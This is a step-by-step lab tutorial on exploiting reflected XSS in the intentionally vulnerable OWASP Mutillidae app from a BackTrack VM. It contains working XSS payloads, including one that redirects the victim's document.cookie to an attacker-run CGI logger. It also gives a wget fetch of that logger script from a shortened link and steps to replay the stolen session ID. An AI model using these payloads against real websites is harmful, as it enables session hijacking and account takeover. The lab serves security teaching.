{ Reflected Cross Site Scripting Injection #1,
Man-In-The-Middle Attack }
Section 0. Background Information |
- What is Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
- What is Cross Site Scripting?
- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.
- XSS enables attackers to inject client-side script into Web pages viewed by other users.
- A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
- In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script.
- What is a Man-In-The-Middle attack?
- The man-in-the-middle attack take on many forms. The most common form is active network eavesdropping in which the attacker is able to gain authentication credentials (Username, Password, SESSIONID, Cookies Information, etc).
- What is Cookie Manager+?
- Cookies manager to view, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
- Note: Remote database access has been turned on to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- BackTrack: Lesson 9: How To Install Firebug
- Note: Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
- BackTrack: Lesson 10: How To Install Cookies Manager+ 1.5.2
- Note: Cookies manager to view, edit and create new cookies.
- Lab Notes
- In this lab we will do the following:
- Due to a purposely bug in the dns-lookup.php code, we will use Reflected Cross Site Scripting Techniques to test for vulnerabilities.
- We will capture UserID and Session Cookie Data.
- We will send captured UserID and Session Cookie Data to a remote location.
- We will use captured UserID and Session Cookie Data to re-enter the website.
- Legal Disclaimer - bài hướng dẫn học tập
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is
- Please record your IP address.
Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
Section 6. Open Console Terminal and Retrieve IP Address |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address
- In your case, it will probably be different.
- This is the machine that will be use to attack the victim machine (Mutillidae).
Section 7. Navigate to "DNS Lookup" |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Open Mutillidae
- Notes (FYI):
- Replace in the following URL -->, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- Click Login/Register
- Login
- Instructions:
- Name: samurai
- Password: samurai
- Click the Login Button
- Notes(FYI):
- We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.
Section 8. Reflected Cross Site Scripting (XSS) Injection #1 - Popup Window |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
- Test Cross Site Script (XSS) Injection
- Instructions:
- In the Hostname/IP Textbox place the following string
- <script>alert("Hello")</script>
- Click the Lookup DNS Button
- View Cross Site Script (XSS) Injection Results
- Note(FYI):
- The fact that we can pop up a JavaScript alert box indicates this webpage is susceptible to Cross Site Script Injections.
- Instructions:
- Click the OK Button
Section 9. Reflected Cross Site Scripting (XSS) Injection #2 - Popup Cookie |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
- Test Cross Site Script (XSS) Injection
- Instructions:
- In the Hostname/IP Textbox place the following string
- <script>alert(document.cookie)</script>
- Click the Lookup DNS Button
- Note(FYI):
- The goal here is to determine (1) if this webpage contains a cookie AND (2) if we can display the cookie in a JavaScript alert box.
- View Cookie
- Instructions:
- Notice the cookie displays the username
- Notice the cookie displays the PHP Session ID.
- Click the OK Button
- Notes(FYI):
- Imagine if this was a bank website and every time a user logs in their cookie information was sent to a remote location.
Section 13. Prepare BackTrack CGI Cookie Script |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Start Apache2
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
- Make Apache Log Directory
- Instructions:
- mkdir -p /var/www/logdir
- chown www-data:www-data /var/www/logdir
- chmod 700 /var/www/logdir
- ls -ld /var/www/logdir
- Note(FYI):
- Make a directory called logdir inside of /var/www
- Set the ownership of logdir to www-data
- Set the permission of logdir to where only the apache2 process (owned by www-data) can read, write and execute to this directory.
- Configure CGI Cookie Script
- Instructions:
- cd /usr/lib/cgi-bin
- wget http://goo.gl/Zb5MZe
- mv logit.pl.TXT logit.pl
- chown www-data:www-data logit.pl
- chmod 700 logit.pl
- perl -c logit.pl
- Note(FYI):
- Change directory to /usr/lib/cgi-bin
- Use wget to download the CGI Cookie Script
- Rename Script
- Set ownership of script to www-data, which is the same owner of the apache2 webserver processes.
- Set permission to where only the www-data user can read, write and execute the script.
- Check the syntax of the CGI Cookie Script (logit.pl)
Section 14. Reflected Cross Site Scripting (XSS) Injection #2 - Popup Cookie |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
- Test Cross Site Script (XSS) Injection
- Note(FYI):
- Replace with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
- In the Hostname/IP Textbox place the following string
- <SCRIPT>document.location=''+document.cookie</SCRIPT>
- Click the Lookup DNS Button
- View Cookie Script Results
- Instructions:
- Notice the Mutillidae IP Address and Vulnerable Weblink
- Notice the cookie username
- Notice the cookie PHP Session ID.
- Notes(FYI):
- Note a malicious person would not actually display the results back to you once you click a button.
- Continue to the next step to see where a malicious person might store this data.
- View Cookie Script Log File
- Note(FYI):
- Replace with your BackTrack IP Address obtained in (Section 6, Step 2).
- Now we have a running log file of IP Addresses, Cookie usernames, and Session IDs of potential victims.
- Pretty scary stuff. This is why it is necessary for web developers to (1) use encoding and (2) test their site for XSS injection attempts.
- Instructions:
- Place the following URL in the Address Textbox
Section 16. Simulate Man-In-The-Middle Attack |
- Start Cookies Manager+
- Notes (FYI):
- Click here to install Cookie Manager+ you have not already done so.
- Instructions:
- Tools --> Cookies Manager+
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add PHPSESSID Cookie Entry
- Note(FYI):
- Replace 6lmbhjodbtnj6o5ajuli7p1s24 with your PHPSESSID See Below Picture).
- Replace with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Content: 6lmbhjodbtnj6o5ajuli7p1s24
- Host:
- Path: /
- Click the Save Button.
- Add showhints Cookie Entry
- Note(FYI):
- Replace with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Click the Add Button
- Name: showhints
- Content: 0
- Host:
- Path: /mutillidae/
- Click the Save Button
- Add username Cookie Entry
- Note(FYI):
- Replace with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Click the Add Button
- Name: username
- Content: samurai
- Host:
- Path: /mutillidae/
- Select Date
- Increase the Date by 1 or 2 days
- Click the Save Button
- Add uid Cookie Entry
- Note(FYI):
- Replace with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Click the Add Button
- Name: uid
- Content: 6
- Host:
- Path: /mutillidae/
- Select Date
- Increase the Date by 1 or 2 days
- Click the Save Button
- Click the Close Button
- Close Firefox
- Note(FYI):
- So, lets test our theory and see if we can still get into the website using the username (samurai) and PHP Session ID we captured.
- Instructions:
- File --> Quit
- Open Mutillidae
- Notes (FYI):
- Replace in the following URL -->, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- Notice samurai is logged in without us clicking Login/Register.
- Proof of Lab, (On a BackTrack Terminal)
- Instructions:
- cat /var/www/logdir/log.txt
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
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